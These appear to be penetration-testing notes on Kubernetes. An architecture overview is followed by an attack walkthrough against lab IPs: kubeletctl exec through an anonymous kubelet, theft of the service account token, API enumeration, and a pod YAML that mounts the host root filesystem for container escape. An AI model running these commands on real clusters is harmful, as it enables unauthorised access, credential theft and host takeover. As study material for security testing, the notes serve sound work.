Kubernetes
Container Orchestration Platform
Architecture
Kubernetes Control Plane
The brain of the Kubernetes cluster: it makes global decisions (such as scheduling) and monitors the overall state of the cluster.
kube-apiserver
Is the central point of communication for all Kubernetes components; all interactions go through it.
It exposes the Kubernetes API and serves as the front end for the Kubernetes control plane.
It handles requests for cluster state and read/write operations to/from etcd.
Handles authentication, authorization, and admission control.
etcd
Is a distributed key-value store used to store all cluster data and state; it ensures that the state is replicated across multiple nodes. It stores:
Configuration of all resources.
The desired state.
The current state.
kube-controller-manager
Is a daemon that runs in the control plane and manages the controllers that regulate the state of the cluster.
Controllers are responsible for ensuring the desired state of the cluster matches the current state. If there is a mismatch, controllers take action to reconcile it: for example, if a pod crashes, the replication controller creates a new pod to maintain the desired number of replicas.
Some key controllers include:
Deployment controller: Ensures the desired number of pod replicas are running.
Node controller: Monitors node health and takes action when nodes fail.
Job controller: Manages the execution of batch jobs.
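The reconcile idea behind these controllers can be sketched as a small loop. This is a toy illustration only, not real controller code: `desired` and `current` are stand-ins for values a controller would read from the API server.

```shell
# Toy reconcile loop: drive the current replica count toward the desired one.
# In a real controller, "creating a replica" is a request to the API server.
desired=3
current=1
while [ "$current" -lt "$desired" ]; do
  echo "reconcile: creating replica $((current + 1))"
  current=$((current + 1))
done
echo "reconcile: current=$current desired=$desired"
```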
kube-scheduler
Is responsible for scheduling pods to run on the worker nodes.
It watches for newly created pods that do not have a node assigned, and then selects the most appropriate node to run the pod based on resource requirements, node availability, and other constraints.
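A toy sketch of that selection step, using invented node names and free-CPU values (a real scheduler filters and scores nodes on many more dimensions than this):

```shell
# Toy node selection: pick the node with the most free CPU (millicores).
# Node names and values are made up for illustration.
best=""
best_free=-1
for entry in node-a:500 node-b:1500 node-c:900; do
  node=${entry%%:*}
  free=${entry##*:}
  if [ "$free" -gt "$best_free" ]; then
    best=$node
    best_free=$free
  fi
done
echo "schedule pod on $best"
```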
cloud-controller-manager
Interacts with the cloud provider's API to manage resources such as:
Managing load balancers.
Handling cloud-specific features.
It abstracts the cloud provider-specific logic, allowing Kubernetes to be agnostic to the underlying infrastructure.
Kubernetes Worker Node
Worker nodes are the machines running the actual application workloads. A Kubernetes cluster can have multiple worker nodes, and each one runs several essential components:
Kubelet
Is an agent that runs on every worker node.
It ensures that the containers described in the pod specs are running and healthy.
It monitors the state of the node and the pods running on it, and communicates with the API server to report the status of the node and its workloads.
If a pod is not running as expected, the kubelet can restart it.
Kube Proxy
Is a network proxy that runs on every worker node.
It maintains network rules for pod communication, allowing services in the cluster to be accessed reliably.
It implements the service abstraction by routing traffic to the correct pods. If a service points to multiple pods, kube-proxy balances traffic between them using round-robin or other strategies.
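The round-robin idea can be sketched as follows. The pod IPs here are invented, and real kube-proxy programs iptables or IPVS rules rather than looping in user space:

```shell
# Toy round-robin: distribute 6 requests across 3 backend pod IPs.
set -- 10.244.0.5 10.244.0.6 10.244.0.7
i=0
for req in 1 2 3 4 5 6; do
  idx=$((i % 3 + 1))
  eval "backend=\$$idx"   # pick backend i mod 3 from the positional params
  echo "request $req -> $backend"
  i=$((i + 1))
done
```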
Container Runtime
Responsible for running the containers on each node. It interacts directly with the underlying infrastructure.
When the kubelet schedules a pod, the container runtime pulls the container images and starts the containers.
Pods
The smallest and most basic deployable objects in Kubernetes. A pod represents one or more containers running together on the same node.
Containers in a pod share the same network namespace, which means they can communicate with each other over localhost, and they can share storage volumes.
Typically, a pod runs a single container, but it can also contain multiple containers that work closely together (e.g., a main app container and a helper container such as a logging agent).
Ports and Protocols
Read the documentation for Ports and Protocols.
Port 8443 is the default port for the API server in minikube.
The kubelet agent listens on port 10250.
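A quick way to check whether those two ports are reachable on a target is bash's `/dev/tcp` pseudo-device (no nmap needed). The IP in the commented usage is an example target from these notes; this sketch assumes `bash` and `timeout` are available:

```shell
# probe HOST PORT: report whether a TCP connection to HOST:PORT succeeds.
probe() {
  timeout 2 bash -c "echo > /dev/tcp/$1/$2" 2>/dev/null \
    && echo "$1:$2 open" \
    || echo "$1:$2 closed/filtered"
}
# probe 10.10.11.133 8443
# probe 10.10.11.133 10250
```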
Enumeration
The kubelet API may allow anonymous access; when it does, kubeletctl can be used to run commands such as run and exec:
```shell
kubeletctl pods -s 10.10.11.133
kubeletctl runningpods -s 10.10.11.133 | jq -c '.items[].metadata | [.name, .namespace]'
kubeletctl -s 10.129.96.98 scan rce
kubeletctl -s 10.10.11.133 exec "/bin/bash" -p nginx -c nginx
```

Default directories where the service account token and certificate are stored:
```
/var/run/secrets/kubernetes.io/serviceaccount
/run/secrets/kubernetes.io/serviceaccount
/secrets/kubernetes.io/serviceaccount
```

Authenticate to the API with the token and certificate to be able to use it:
```shell
export token=$(kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx)
kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token get pod
kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token get namespaces
kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token cluster-info
kubectl auth can-i --list --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token
```

Exploitation
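Since the `--server`, `--certificate-authority`, and `--token` flags repeat on every kubectl call, a small wrapper function keeps the commands short. This is a convenience sketch using the same target values as above; the function name `k` is arbitrary:

```shell
# k: kubectl preloaded with the server, CA, and token flags used above.
# Assumes $token is already exported and ca.crt is in the current directory.
k() {
  kubectl --server https://10.10.11.133:8443 \
          --certificate-authority=ca.crt \
          --token="$token" "$@"
}
# k get pod
# k auth can-i --list
```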
Create a malicious Pod
It's possible to mount the host file system within a new container:
Dump an existing pod's spec to use as a template:

```shell
kubectl get pod nginx -o yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token
```

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: tokyo-pod
  namespace: CHANGE ME
spec:
  containers:
  - name: tokyo-pod
    image: CHANGE ME
    volumeMounts:
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true
```

```shell
kubectl apply -f evil-pod.yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token
kubeletctl -s 10.10.11.133 exec "/bin/bash" -p tokyo-pod -c tokyo-pod
```